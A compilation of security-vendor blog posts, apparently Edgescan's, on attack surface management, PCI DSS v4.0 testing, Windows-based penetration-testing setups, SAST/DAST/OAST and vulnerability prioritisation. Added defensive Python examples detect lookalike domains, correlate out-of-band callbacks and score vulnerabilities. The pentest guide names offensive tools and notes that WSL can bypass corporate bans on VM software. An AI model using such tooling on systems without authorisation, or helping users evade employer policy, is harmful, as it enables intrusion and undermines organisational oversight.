validity and expiration dates. Why?Assess encryption strength to detect weaknesses in cryptography which may result in breach or vulnerability. Assistance with compliance, given weak certificates can result in compliance fails.Revoking compromised certificates is important. Healthy certificates demonstrate adherence to security requirements.Search engines consider HTTPS (secured by TLS) as a ranking factor. Healthy certificates positively impact SEO.Service Discovery discover exposed ports and running services on discovered domains. 
Why? Understand your landscape and discover exposures related to what’s deployed. Not all exposures are vulnerabilities; some are simply services that should not be exposed (e.g., remote desktop, FTP or a database exposed, possibly because the service is unknown or a firewall is misconfigured).
- HTTP probing probes HTTP(S) service availability and status. Note that this is redundant if you are also using the service discovery task; it is offered as a lightweight alternative for situations where port scanning would not be appropriate.
- Registered domains exploration finds domains that are registered, or have been registered in the past, by the same entity that registered a target domain. Why? Understanding the history of a domain may help with contact details, understanding SEO, blacklisting, past usage, domain reputation, and domain health.
- Typosquatting and similar domain discovery reports domains that are lexicographically similar to target domains. This can help identify typosquatting and domains using other TLDs with the same name. Note that this task can take a long time to complete and may generate a lot of noise.

Fig 2. EASM Investigation types

#### Why is it important?

ASM is an important tenet of vulnerability detection and management. We need to continuously keep abreast of our landscape to help ensure all of it is undergoing a level of vulnerability detection and focus.

#### Is ASM penetration testing or vulnerability management?

ASM is all about visibility. The term has been twisted and stretched to include vulnerability scanning and penetration testing, but ASM in effect is measuring the landscape (attack surface). Once we understand the landscape we can “push” that intelligence to RBVM (Risk-Based Vulnerability Management) and tee up penetration tests as required.

#### How Edgescan looks at ASM

Edgescan views ASM as (1) discovery and mapping of the landscape and (2) continuous profiling of discovered assets.
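The typosquatting and similar domain discovery task described above works on lexicographic similarity. The following is an added example of that kind of check for a defender's own watch-list, not Edgescan's code: the watch-list, the observed-registration feed and the edit-type labels are all constructed for the example.

```python
# Lookalike-domain detection for a defender's watch-list (constructed example).
from dataclasses import dataclass
from typing import List, Optional, Tuple

TARGET_DOMAINS = ["edgescan.com"]  # constructed watch-list of the organisation's own domains

# Constructed stand-in for a registration or certificate-transparency feed.
OBSERVED_DOMAINS = [
    "edgescan.com",     # our own domain: must not be flagged
    "edgesacn.com",     # two letters swapped
    "edgscan.com",      # one letter dropped
    "edgescan.net",     # same name under another TLD
    "edge-scan.com",    # hyphen inserted
    "edgescam.com",     # one letter substituted
    "rnedgescan.com",   # two edits away: below the default threshold, not flagged
    "example.org",      # unrelated
]


@dataclass(frozen=True)
class Lookalike:
    candidate: str
    target: str
    kind: str
    distance: int


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: Levenshtein plus adjacent transposition,
    so swapping two neighbouring letters costs 1 instead of 2."""
    m, n = len(a), len(b)
    d = [[0] * (n + 1) for _ in range(m + 1)]
    for i in range(m + 1):
        d[i][0] = i
    for j in range(n + 1):
        d[0][j] = j
    for i in range(1, m + 1):
        for j in range(1, n + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[m][n]


def split_domain(domain: str) -> Tuple[str, str]:
    """Split 'label.tld'; multi-label public suffixes (e.g. co.uk) are out of scope here."""
    label, _, tld = domain.lower().rpartition(".")
    return label, tld


def classify(target: str, candidate: str, max_distance: int = 1) -> Optional[Lookalike]:
    """Return how `candidate` resembles `target`, or None if identical or too different."""
    if candidate.lower() == target.lower():
        return None
    t_label, _ = split_domain(target)
    c_label, _ = split_domain(candidate)
    if c_label == t_label:                       # same name, different TLD
        return Lookalike(candidate, target, "other-tld", 0)
    dist = osa_distance(t_label, c_label)
    if c_label.replace("-", "") == t_label.replace("-", ""):
        return Lookalike(candidate, target, "hyphenation", dist)
    if dist > max_distance:
        return None
    if len(c_label) < len(t_label):
        kind = "omission"
    elif len(c_label) > len(t_label):
        kind = "insertion"
    elif sorted(c_label) == sorted(t_label):
        kind = "transposition"
    else:
        kind = "substitution"
    return Lookalike(candidate, target, kind, dist)


def find_lookalikes(targets=TARGET_DOMAINS, observed=OBSERVED_DOMAINS,
                    max_distance: int = 1) -> List[Lookalike]:
    """Run every observed domain against every watched domain. As the page notes, this
    task is noisy by design, so the caller chooses the distance threshold."""
    hits = []
    for target in targets:
        for candidate in observed:
            hit = classify(target, candidate, max_distance)
            if hit:
                hits.append(hit)
    return hits


if __name__ == "__main__":
    for hit in find_lookalikes():
        print(f"{hit.candidate:16} {hit.kind:14} (distance {hit.distance}) ~ {hit.target}")
```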
Once items are discovered they may have some exposures which are not specifically CVEs or “vulnerabilities” per se, but simply services which should not be exposed (such as remote login, administration or database services). In Edgescan you can add (via one click) a newly discovered asset to our RBVM or PTaaS functions to undergo validated full-stack scanning, API assessment or web application Penetration Testing as a Service (PTaaS).

Fig 3. Adding a newly discovered asset in EASM to RBVM or PTaaS

#### Coupling ASM with RBVM & PTaaS

- Discover new assets not under vulnerability management or not undergoing PTaaS, and unexpected assets owned by your organization which come as a surprise.
- One click to add the asset to an unlimited RBVM schedule or to schedule it for penetration testing.
- Continuously monitor the asset for services, changes and exposures.

It is as simple as that:
- ASM for visibility and landscape (attack surface) mapping
- RBVM for continuous scanning for web application and host/network vulnerabilities (full-stack)
- PTaaS for deep penetration testing using OSCP & CREST certified testers

### Navigating PCI DSS v4.0 with Edgescan

The transition from PCI DSS v3.2.1 to PCI DSS v4.0 marks a significant shift towards a more proactive approach to payment security. PCI DSS v3.2.1 is set to retire on March 31, 2024, but certain requirements of PCI DSS v4.0 will not be mandatory until a one-year grace period has passed. Today, we will focus on the changes under Requirement 11 of PCI DSS v4.0, which concerns vulnerability scanning and penetration testing. First, we will explore the difference between vulnerability scanning and penetration testing according to PCI DSS v4.0, since this can be a point of confusion (no doubt exacerbated by certain vendors marketing “automated penetration testing” services).

#### Vulnerability Scanning vs. Penetration Testing

Vulnerability scanning is an automated process to identify potential vulnerabilities in a network or web application.
These scans serve as a preliminary step, providing a snapshot of the potential security weaknesses that exist within an environment. Vulnerability scanners are tools, and their results need to be validated by humans afterwards.

Penetration testing, on the other hand, is not a tool. Rather, it is a service performed by experienced professionals. Penetration tests go much deeper than vulnerability scans, which rely purely on automation. As defined by the PCI SSC, penetration testing involves a credentialed expert actively attempting to exploit vulnerabilities to determine how an attacker could potentially enter an environment. Penetration testing simulates real-world attack scenarios to help define an organization’s potential exposure and devise a strategy to remediate those vulnerabilities.

Vulnerability scanning is usually the first step when performing a penetration test, but a human is always required to interpret the results. A penetration test is not deemed adequate if it solely focuses on exploiting vulnerabilities identified in a scan. Penetration testers, with their deep knowledge of systems and potential attack strategies, manually probe for weaknesses. Techniques employed by penetration testers to obtain this extra layer of depth include fuzzing, injection, forgery tests, and business logic testing (scanners lack the real-world risk context that humans possess). They may use automated tools as part of their toolkit, but the expertise and creative problem-solving of the tester are indispensable, since those qualities cannot be automated.

For example, if a vulnerability scan identifies a potential weakness in an application server, a penetration tester may use this foothold to launch subsequent attacks that an automated tool would not attempt.
By chaining exploits and using the compromised server as a staging point, testers can simulate complex attack paths that an attacker might use, uncovering layers of potential weaknesses that a scan alone would not be able to reveal.

Penetration testing also includes the assessment of security monitoring and detection methods. Testers confirm the effectiveness of logging and file integrity monitoring mechanisms, aspects critical to an organization's ability to detect and respond to an attack.

#### Requirement 11

##### Quarterly Vulnerability Scanning

Under requirement 11.3.2, organizations are required to have vulnerability scans conducted quarterly by a PCI SSC Approved Scanning Vendor (ASV). This adjustment emphasizes the importance not only of identifying vulnerabilities but also of resolving them in line with the ASV Program Guide’s standards. While only quarterly scans are required, scanning after significant changes to infrastructure or applications, such as adding new network devices or pushing deployments to production, is encouraged.

The Edgescan platform only shows validated vulnerabilities, which means no false positives in Edgescan’s scanning results. On average, not having to validate false positives saves organizations a few hours of precious security resources every week.

##### Annual Penetration Testing on Cardholder Data Environments (CDEs)

The updated requirements, 11.4.2 and 11.4.3, mandate an annual penetration test on both internal and external CDEs. They also mandate penetration tests following significant changes to infrastructure or applications.

##### Verification of Remediation and Risk-Based Approach

The new standard requires repeat testing to verify the effectiveness of corrective actions (11.4.4). In doing so, PCI DSS v4.0 also advocates a risk-based approach to prioritizing remediation efforts. Edgescan offers unlimited, no-charge retesting on any penetration testing finding.
This ensures that any remediation efforts are verified effectively, providing continuous compliance without the financial strain of paying for retesting days to verify remediation. Edgescan also dynamically risk-rates every vulnerability according to EPSS (Exploit Prediction Scoring System), the CISA (Cybersecurity and Infrastructure Security Agency) KEV (Known Exploited Vulnerabilities) catalogue, CVSS (Common Vulnerability Scoring System) and asset criticality, to ensure that you are properly triaging PCI-failing vulnerabilities in the context of your organization.

##### Segmentation Controls and Multi-Tenant Service Providers

Requirement 11.4.5 necessitates testing segmentation controls annually or after any changes, which is critical for isolating the cardholder data environment (CDE). For multi-tenant service providers, the new standard (11.4.6) calls for validating logical separation controls biannually with a penetration test. Another set of biannual penetration tests is required (A.1.1.4) for multi-tenant service providers to determine adequate separation between customers in their environment. Requirement 11.4.7 increases the emphasis on multi-tenant service providers assisting customers with their external penetration tests.

#### Conclusion

Edgescan is recognized as a PCI Approved Scanning Vendor (ASV) and offers an integrated platform where organizations can manage both their penetration testing findings and their vulnerability scanning results. Consolidating these functions allows for a more efficient and holistic approach to maintaining PCI DSS v4.0 compliance. The transition to PCI DSS v4.0 will significantly impact how organizations approach vulnerability scanning and penetration testing.
Edgescan's PCI compliance program utilizes a risk-based approach and unlimited, no-charge retesting on penetration testing findings to deliver simple but affordable PCI DSS v4.0 compliance.

### Guide: How to Conduct Penetration Testing Using the Built-in Features of Windows Part Two

In the second part of this two-part series, we will review each of the features in the order outlined above, provide background information about each one, explain their limitations and integrations, and offer installation details with tips on how to utilize them. Supporting graphics are also included to make it easier to understand.

#### Reverse Engineering Utilising Windows Sandbox

##### What is Windows Sandbox?

Microsoft introduced a feature called Windows Sandbox in the May 2019 update. It is designed to provide a lightweight desktop environment to run applications in an isolated system. All software and applications installed inside this environment remain sandboxed and run separately from the host machine. All files stored inside Windows Sandbox are temporary; once it is closed, all files and state are deleted. However, with the Windows 11 22H2 update, data persists through a restart of the environment initiated from inside the virtualised system. This addition is intended to allow the installation of applications that require the OS to reboot.

Figure 1. Screenshot showing Windows Sandbox

##### How to Install It

Windows Sandbox is included in the core versions of Windows 10/11 Pro and Enterprise; it can be set up through the “Turn Windows features on or off” window.

Figure 2. Screenshot showing the Windows Features window where Sandbox can be enabled or disabled

##### How Pen Testers Can Use the Sandbox

Now that we know what it is, how can this be used for penetration testing?
We can use this feature in three ways for penetration testing:
- First, for testing thick clients or desktop applications, installing the software in this environment instead of on our host machine.
- Second, when performing a configuration review, to sign into the organisation’s accounts and keep them separate from our own.
- Finally, to test new tools and exploit scripts that require Windows to run, without risking or endangering our host machine and network.

Figure 3. Screenshot showing a sample configuration file.

This configuration file can be used to control different settings inside the environment, such as:
- Enabling or disabling the virtualised GPU
- Enabling or disabling network/internet access for the system
- Specifying which folders on the host machine, if any, it can access, and whether that access includes read or write permissions
- Specifying how much memory the system is allowed to utilise
- Specifying a command to be run whenever the environment is started

If we were to start the Windows Sandbox environment using the sample configuration file above, we would get something like the following:

Figure 4. Screenshot showing the environment after using the configuration file.

This environment has access to a selection of reverse engineering tools hosted in one of the folders we provided read access to. The virtual GPU and network access have been disabled for the environment, and we have allowed it to access our Downloads folder.

##### Reverse Engineering Using Windows Sandbox

With an environment set up like this from the configuration file specified, we can easily install some common reverse engineering tools such as Immunity Debugger or IDA.

Figure 5.
Screenshot showing the environment after installing Immunity Debugger and IDA

These reverse engineering tools still work and function as they would on any other Windows environment, but are isolated from your host machine in the same way as if you were running a Windows virtual machine inside VMware or VirtualBox. Below are examples of four reverse engineering tools that can be run and utilized inside the sandbox environment, using Vulnserver as the target .exe file for each.

Immunity Debugger

Figure 6. Screenshot showing Immunity Debugger running inside the Sandbox

IDA

Figure 7. Screenshot showing IDA running inside the Sandbox

dnSpy

Figure 8. Screenshot showing dnSpy running inside the Sandbox

Radare2

Figure 9. Screenshot showing Radare2 running inside the Sandbox

##### Reminder

While this is a security feature that Microsoft added to help protect Windows users from malware, it can still become an avenue of attack for malicious parties. In 2020, reverse engineer Jonas Lykkegaard released a zero-day vulnerability in Windows Sandbox on Twitter: https://twitter.com/jonasLyk/status/1300935382561894403. It allowed an unprivileged user to create an arbitrary file in the C:\Windows\System32 folder during the activation of Windows Sandbox; the exploit required Hyper-V to be active on the machine in question.

#### Conclusion: What Good Are These for Us?

To conclude, what good are these for us as penetration testers, and why would we want to use them over something like VMware or VirtualBox for normal VMs and Android Studio for emulators? To begin with, they are faster to use and use fewer resources than those products. There is no need to wait for VMware or VirtualBox to open and boot the OS before you can access any tools within it. As previously mentioned, there is also built-in integration between the host Windows operating system and these platforms.
They are intended to add additional functionality and features to enrich the Windows operating system, and as such, more integrations will be added over time. If corporate policies block the installation and use of VMware or VirtualBox, these features can bypass that policy. Alternatively, if your organisation uses Azure VMs, VMware and VirtualBox cannot be installed on the system. I was talking to a client recently who stated that he was not allowed to install VMware or VirtualBox on his corporate machine to host a Kali Linux virtual machine. However, he got around this by installing the Kali Linux WSL image.

#### Honourable Mentions

Before we wrap this blog post up, there are some additional features introduced by Windows that deserve a mention but do not warrant full inclusion.
- In 2020, Microsoft released the Windows Package Manager, allowing users to install applications and services from the command line. It can be run from PowerShell or Command Prompt using the command winget.
- In 2022, Microsoft also released Dev Tunnels, a feature that allows users to share local web services on their machine across the internet. In the August 2023 update for VS Code, Microsoft introduced a feature to allow locally running services to be shared over the internet.
- In 2019, Microsoft launched Windows Terminal, a terminal emulator. It became the default terminal application in Windows 11 and can be installed on Windows 10 through the Microsoft Store. It has a few useful features, such as window splitting and Quake Mode.

### Guide: How to Conduct Penetration Testing Using the Built-in Features of Windows Part One

Windows has a reputation among security professionals for not being the best operating system for performing penetration tests. This is mainly because Unix-based OSs are more customizable than Windows, which is usually more restricted.
However, in the last seven years, Windows has introduced new features to attract more developers, add more security to the system, and offer new experiences. These features include:
- Windows Subsystem for Linux (WSL): provides a general-purpose penetration testing environment.
- Windows Sandbox: can be used for various purposes, such as reverse engineering.
- Windows Subsystem for Android (WSA): can be used as an emulation platform for testing Android applications.

In this two-part series, we will review each of the features in the order outlined above, provide background information about each one, explain their limitations and integrations, and offer installation details with tips on how to utilize them. Supporting graphics are also included to make it easier to understand.

#### Part One: Test Environment Creation Using Windows Subsystem for Linux (WSL)

##### What is Windows Subsystem for Linux (WSL)?

Introduced in 2016 for Windows 10, the Windows Subsystem for Linux (WSL) was initially designed as an emulator to run Linux binaries within a Windows environment. However, on release, it had limited use for penetration testing due to poor support for features such as networking. In May 2019, WSL2 was released as an improved version of its predecessor. This update significantly changed how WSL worked, converting it into a lightweight virtual machine. However, the base version of WSL2 did not include a desktop environment and remained a command-line utility.

##### Operating Systems Used by WSL

Several operating systems are available to be installed and run through WSL:

Popular distributions:
- Ubuntu (18.04 LTS, 20.04 LTS, 22.04 LTS, etc.)
- Debian

Enterprise distributions:
- Oracle Linux (7.9, 8.5, 9.1)
- openSUSE Leap 15.5
- SUSE Linux Enterprise Server 15 SP4
- SUSE Linux Enterprise 15 SP5
- openSUSE Tumbleweed

Security-focused distributions:
- Kali Linux Rolling

Others are available through GitHub or the Microsoft Store. There is also functionality within WSL to import a Unix distribution from a tar file or to create a custom Linux distribution for use in WSL. When installing WSL, the latest version of Ubuntu is set up by default; however, the distribution can be changed to one of those listed above.

##### Kali Linux

The presence of Kali Linux as one of the officially supported distributions for WSL is of most interest to us as penetration testers. It is a blank distribution, like the versions Kali supports on AWS or Azure. A guide for installing Kali Linux in WSL can be found here: Kali WSL | Kali Linux Documentation. Even though the distribution does not contain any penetration testing tools, they can easily be installed using the Kali Linux metapackages.

##### Limitations of Windows Subsystem for Linux

Before we go any further, there are some drawbacks to WSL which should be called out. The networking for the WSL virtual machine is set to use NAT during initialization, and there is no official support for changing the networking type. Therefore, if you are trying to access the WSL virtual machine from an internal physical network, you will need to set up port forwarding in Windows. It should also be noted that there is limited support for USB devices in WSL. While it is possible to pass USB drives through to the virtual machine, there is no official support for USB adapters such as Wi-Fi adapters. Virtualization software like VirtualBox or VMware would be better if you need these two features for a penetration test. Otherwise, you can use WSL.

##### Win-KeX

Kali created a software package called Win-KeX to provide the WSL distribution of Kali Linux with a desktop environment.
This can be installed using the guide available here: Win-KeX | Kali Linux Documentation. When installed, three different modes can be used to provide different desktop experiences:

Window Mode: This mode opens a VNC window into Kali and provides a full desktop experience.

Figure 1. Screenshot showing Win-KeX open in Window mode

Seamless Mode: This mode creates an overlap between Windows and Kali Linux; it places the Kali taskbar at the top of the screen to share the Windows desktop between Windows and Kali applications.

Figure 2. Screenshot showing Win-KeX open in Seamless mode

Enhanced Session Mode: This mode makes use of protocols and clients that are natively installed in Windows; it opens an RDP window into the Kali virtual machine. It is designed for systems running Windows on the ARM architecture.

Figure 3. Screenshot showing Win-KeX open in Enhanced Session Mode

##### Windows Integration

Integration between WSL and Windows is built into the core experience of WSL distributions. As part of this, the file system of either the WSL virtual machine or the host Windows system can be accessed from the other system. There is no need to create a shared folder to share files between the host and guest systems. Inside the WSL distribution, the Windows file system can be accessed from the /mnt folder, as seen below.

Figure 4. Inside the WSL distribution, the Windows file system can be accessed from the /mnt folder

Meanwhile, Windows 11 has a network shortcut in Windows Explorer to access the WSL file system. In Windows 10, the file system can be accessed by typing \\wsl$ in the address bar of Windows Explorer.

Figure 5. In Windows 11, you can access the WSL file system through a network shortcut in Windows Explorer.

##### WSLg

Windows has also recently introduced a feature into WSL called WSLg, which supports running Unix GUI applications on Windows in an integrated desktop environment using X11 and Wayland.
This allows users to access tools in Kali Linux that have a GUI straight from inside Windows. These tools can be run straight from the Start menu or the Windows search bar.

Figure 6. Screenshot showing that we can access several tools straight from the Start menu.

Figure 7. Screenshot showing that we can search for Kali Linux tools in the search bar.

##### Network Scanning

We can perform network scanning inside WSL by utilizing tools such as masscan, nmap, unicornscan, etc., that are installed as part of the Kali metapackages.

Figure 8. Screenshot showing that we can run tools such as nmap or masscan

##### Application Testing

We can also perform testing against web applications by utilising tools such as DirBuster or Burp Suite that are installed as part of the Kali metapackages.

Figure 9. Screenshot showing that we can run tools such as DirBuster

Figure 10. Screenshot showing that we can perform web application testing using tools such as Burp Suite

##### Non-Default Tools

In addition, we can also access and use tools that are not installed in Kali Linux by default, such as BloodHound, a tool for viewing Active Directory domain information in graph form.

Figure 11. Screenshot showing that we can use non-default tools like BloodHound

### SAST vs DAST vs OAST

The two most prominent approaches to application security testing are Static Application Security Testing (SAST) and Dynamic Application Security Testing (DAST). While both play critical roles in identifying vulnerabilities, there is a growing consensus in the cybersecurity community about the benefits of DAST when combined with Out-of-Band Application Security Testing (OAST). This article compares SAST, DAST, and OAST, and describes how DAST working together with OAST can paint the most comprehensive picture of a web application’s risk posture.

#### SAST

Static Application Security Testing (SAST) examines source code at a fixed point in time.
It is a "white-box" testing method that analyzes an application from the inside out, checking the codebase for security flaws without executing the code.

Benefits of SAST:
- Early detection: identifies vulnerabilities early in the development cycle.
- Comprehensive code coverage: scans the entire codebase, including areas that might be missed during manual review.
- Language specific: customized to understand specific programming languages deeply.

Limitations of SAST:
- False positives: the level of detail from SAST scanners generally leads to noisy results, generating false positives that require manual validation to prove they aren’t real vulnerabilities. This takes away time that could be spent on business or internal IT projects; otherwise, the noisy false positive results annoy developers!
- False negatives/limited runtime analysis: cannot identify issues that only appear during an application's execution.
- Legacy technology: may struggle to keep pace with the latest frameworks and languages, due to the specificity of SAST scanners.

#### DAST

Dynamic Application Security Testing (DAST) is a "black-box" technique that tests an application from the outside during runtime. It is designed to simulate the point of view of a hacker trying to exploit vulnerabilities in web applications. DAST can be deployed in production or pre-production environments.

Benefits of DAST:
- Real-world attack simulation: detects external attack surface vulnerabilities that only appear when the application is running.
- Language agnostic: works independently of the programming language, making it versatile for large enterprises with thousands of web applications.
- Identification of runtime issues: catches problems related to authentication, session management, and more.
- Accurate results: DAST produces results with high accuracy and very few false positives.

Limitations of DAST:
- False positives/negatives: DAST is not ideal for discovering blind vulnerabilities or asynchronous bugs, but these weaknesses can be shored up by employing OAST. “Good” DAST should generally still require validation to reduce noise.
- Limited code visibility: cannot pinpoint the exact location in the code where the vulnerability exists.

#### OAST

Out-of-band Application Security Testing (OAST) detects vulnerabilities that are not observable in the standard responses of the tested application. OAST works by sending an attack payload that causes an interaction with a monitored external system sitting outside the target domain. The interaction that the external system receives in response to the initial attack payload determines whether a vulnerability was discovered. DAST provides a realistic snapshot of an application’s security posture in production, but its capabilities are significantly enhanced when combined with OAST.

Benefits of OAST:
- Detection of hidden vulnerabilities: ideal for identifying complex security issues such as blind SQL injection, server-side request forgery (SSRF) or OS code injection.
- Zero-day coverage: SAST and DAST scanners typically rely on vulnerability signatures or patterns. OAST utilizes vulnerability signatures but also detects unusual responses that might indicate the presence of a zero-day vulnerability. The infamous Log4Shell vulnerability was discovered by capturing a DNS A request using out-of-band techniques.
- Identify attack surface: OAST can identify vulnerabilities in complex applications that include distributed architectures and microservices. It can even test APIs, whose vulnerabilities are becoming an increasingly popular attack vector.

#### Conclusion

SAST is ideal for early codebase analysis, while DAST excels in simulating real-world attack scenarios.
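The out-of-band mechanism described in the OAST section (a probe that can only be confirmed by an interaction with a system the tester controls) comes down to correlation: each injection point gets a unique token, and callbacks seen by the listener are matched back to it. The following is an added example of that correlation step, not code from the article or from Edgescan; the listener domain `oast.example`, the log format and the log lines are constructed.

```python
# Correlating out-of-band (OAST) callbacks with the test cases that caused them (constructed example).
import re
import secrets
from dataclasses import dataclass, field
from typing import Callable, Dict, Iterable, List

LISTENER_DOMAIN = "oast.example"  # placeholder: a listener domain the tester controls

# Constructed listener log format: "<timestamp> <DNS|HTTP> <detail...> from <source-ip>"
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<proto>DNS|HTTP)\s+(?P<detail>.+?)\s+from\s+(?P<src>\S+)$")


@dataclass
class TestCase:
    target: str         # URL the probe was sent to
    parameter: str      # parameter or header that carried the probe
    token: str
    interactions: List[dict] = field(default_factory=list)


class OastSession:
    """Mints one unique token per injection point and later maps callbacks back to it."""

    def __init__(self, listener_domain: str = LISTENER_DOMAIN,
                 token_factory: Callable[[], str] = lambda: secrets.token_hex(8)):
        self.listener_domain = listener_domain
        self._new_token = token_factory
        self.cases: Dict[str, TestCase] = {}
        # Bound the token on both sides so "<token>.oast.example.attacker.test" does not match.
        self._token_re = re.compile(
            r"(?<![0-9a-f])(?P<token>[0-9a-f]{16})\." + re.escape(listener_domain) + r"(?![\w.-])")

    def register(self, target: str, parameter: str) -> str:
        """Return the unique callback hostname to embed in the probe for this injection point."""
        token = self._new_token()
        self.cases[token] = TestCase(target, parameter, token)
        return f"{token}.{self.listener_domain}"

    def ingest(self, log_lines: Iterable[str]) -> int:
        """Parse listener log lines; returns how many were attributed to a known test case."""
        matched = 0
        for line in log_lines:
            m = LINE_RE.match(line.strip())
            if not m:
                continue                       # not in the listener's format: ignore
            t = self._token_re.search(m["detail"])
            if not t or t["token"] not in self.cases:
                continue                       # unknown or stale token: noise, not evidence
            self.cases[t["token"]].interactions.append(
                {"ts": m["ts"], "protocol": m["proto"], "source": m["src"]})
            matched += 1
        return matched

    def findings(self) -> List[TestCase]:
        """Test cases with at least one interaction, earliest callback first. A DNS-only
        interaction already proves the payload was processed out-of-band (the Log4Shell case
        mentioned above); an HTTP callback additionally shows outbound connectivity."""
        hit = [c for c in self.cases.values() if c.interactions]
        return sorted(hit, key=lambda c: c.interactions[0]["ts"])


def demo() -> List[TestCase]:
    """Deterministic walk-through with constructed tokens and constructed log lines."""
    tokens = iter(["1" * 16, "2" * 16, "3" * 16])
    s = OastSession(token_factory=lambda: next(tokens))
    s.register("https://app.example/search", "q")
    s.register("https://app.example/api/export", "url")
    s.register("https://app.example/login", "User-Agent")
    log = [
        "2024-05-01T10:00:01Z DNS A 1111111111111111.oast.example from 203.0.113.10",
        "2024-05-01T10:00:02Z HTTP GET http://1111111111111111.oast.example/ from 203.0.113.10",
        "2024-05-01T10:00:05Z DNS A 3333333333333333.oast.example from 198.51.100.7",
        "2024-05-01T10:00:09Z DNS A 9999999999999999.oast.example from 198.51.100.7",    # never issued
        "2024-05-01T10:00:10Z DNS A 1111111111111111.other.example from 203.0.113.10",  # wrong listener
        "malformed line",
    ]
    s.ingest(log)
    return s.findings()


if __name__ == "__main__":
    for case in demo():
        protos = sorted({i["protocol"] for i in case.interactions})
        print(f"{case.target} [{case.parameter}] -> out-of-band interaction via {protos}")
```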
SAST is a necessary tool for debugging before deploying a web application, but it doesn’t offer continuous coverage of your production environment or the ability to detect runtime issues. Combining DAST with OAST offers a more comprehensive and actionable approach to security testing once an application has been deployed. OAST is particularly effective in detecting and addressing complex issues like blind vulnerabilities, which might otherwise go unnoticed by traditional application security testing methods. DAST provides highly accurate results, where you can be sure the vulnerabilities being discovered are real. As cybersecurity threats grow more sophisticated, the integration of DAST with OAST represents a proactive trend in application security, ensuring more secure and resilient applications in an increasingly digital world.

### Edgescan eXposure Factor (EXF)

Helping you prioritize vulnerability mitigation at scale: improving MTTR (Mean Time To Remediation) of critical weaknesses with EXF.

Prioritization is key once you can assume a list of validated and accurate vulnerabilities. Edgescan only ever delivers validated and accurate vulnerabilities, with virtually no false positives. The ability to answer the question “What should I fix first?” dramatically improves efficiency when dealing with resource management and provides optimum value to your business and security posture. Let's fix and secure what matters.

Edgescan has designed a system to help you easily figure out which vulnerabilities are most urgent. We call it EXF (Edgescan eXposure Factor), and it uses dynamically generated breach probability data via the Exploit Prediction Scoring System (EPSS), combined with the CVSS (Common Vulnerability Scoring System) score and whether the vulnerability is flagged by CISA (Cybersecurity & Infrastructure Security Agency) on the CISA KEV (Known Exploited Vulnerabilities) catalogue.
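Risk-based prioritisation of the kind just described (CVSS, EPSS and KEV membership combined, then filtered by asset criticality) as an added illustration that is not Edgescan's EXF formula, which is proprietary: the weights, the VULN-* identifiers, the asset names and the findings are all constructed assumptions for this example.

```python
# Blending CVSS, EPSS and CISA KEV into a 0-100 exposure score, then asking the
# "critical assets first" question. Constructed example; weights are an assumption.
from dataclasses import dataclass
from typing import FrozenSet, Iterable, List, Tuple


@dataclass(frozen=True)
class Finding:
    vuln_id: str          # placeholder identifiers, not real CVE numbers
    asset: str
    cvss: float           # CVSS base score, 0.0-10.0
    epss: float           # EPSS probability of exploitation within 30 days, 0.0-1.0
    in_kev: bool          # listed in the CISA Known Exploited Vulnerabilities catalogue
    tags: FrozenSet[str]  # asset metadata set by the owner, e.g. {"critical", "pci"}


def exposure_score(f: Finding) -> int:
    """Assumed blend (not Edgescan's formula): CVSS contributes up to 40 points, EPSS up to
    40 and a KEV listing a flat 20, so evidence of real-world exploitation outranks severity
    alone. Result is clamped to 0-100."""
    if not (0.0 <= f.cvss <= 10.0 and 0.0 <= f.epss <= 1.0):
        raise ValueError(f"{f.vuln_id}: CVSS or EPSS out of range")
    raw = 4.0 * f.cvss + 40.0 * f.epss + (20.0 if f.in_kev else 0.0)
    return int(round(max(0.0, min(100.0, raw))))


def prioritise(findings: Iterable[Finding]) -> List[Tuple[int, Finding]]:
    """(score, finding) pairs, highest exposure first; ties broken by CVSS, then id."""
    scored = [(exposure_score(f), f) for f in findings]
    return sorted(scored, key=lambda p: (-p[0], -p[1].cvss, p[1].vuln_id))


def critical_first(findings: Iterable[Finding], tag: str = "critical",
                   min_score: int = 50) -> List[Tuple[int, Finding]]:
    """The 'show me high scores across assets marked critical' query: the asset tag is
    a filter on top of the score, not a component of it."""
    return [(s, f) for s, f in prioritise(findings) if tag in f.tags and s >= min_score]


# Constructed sample: similar CVSS values land very differently once EPSS and KEV are in.
SAMPLE = [
    Finding("VULN-0001", "web-prod-01", 9.8, 0.97, True, frozenset({"critical", "pci"})),
    Finding("VULN-0002", "intranet-wiki", 7.5, 0.02, False, frozenset()),
    Finding("VULN-0003", "dev-box-07", 5.3, 0.90, False, frozenset({"internal"})),
    Finding("VULN-0004", "db-01", 9.1, 0.01, False, frozenset({"critical"})),
    Finding("VULN-0005", "vpn-gw", 6.5, 0.30, True, frozenset({"critical"})),
]

if __name__ == "__main__":
    for score, f in prioritise(SAMPLE):
        print(f"{score:3d}  {f.vuln_id}  {f.asset:14} cvss={f.cvss} epss={f.epss} kev={f.in_kev}")
    print("critical assets, score >= 50:", [f.vuln_id for _, f in critical_first(SAMPLE)])
```

Note how VULN-0004 (CVSS 9.1 on a critical asset) drops below VULN-0003 (CVSS 5.3) once its negligible EPSS is taken into account, which is the effect the text attributes to EXF-style prioritisation.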
By combining this metadata and applying it to a discovered and validated vulnerability, Edgescan provides a simple 0 to 100 scoring system, where a lower score indicates minimal risk and a higher score signifies greater exposure.
- The Edgescan eXposure Factor is displayed to the user on the Vulnerabilities page under the title EXF.
- EXF is recalibrated daily via dynamic feeds to keep pace with exploitation intelligence “in the wild.”

EXF values highlighted based on vulnerability severity/CVSS, EPSS, and CISA KEV presence.

#### Combining EXF with Other Asset Metadata

Edgescan gives you the ability to set the relative criticality of an asset and the associated metadata relating to it. By leveraging search criteria, you can focus on high EXF-scoring vulnerabilities across critical assets even if you have thousands of systems under management. E.g., “Show me EXF scores for all assets marked critical across my global landscape.”

Asset tagged as “Critical.”

Vulnerabilities with high CVSS scores and associated EPSS/EXF.

### How to Achieve Continuous Visibility and Faster Remediation with a Modern Vulnerability Management System

A review of the evolution of vulnerability management to understand the components necessary for modernizing security programs.

While modern-day strategies for a complete and effective security posture must include a combination of proactive and reactive security tools and processes, a fundamental component must always be vulnerability management. While not a new technology or process by any means, vulnerability management (VM) remains a key tool in any enterprise’s security toolbox and should be used as part of its overall security best practices.

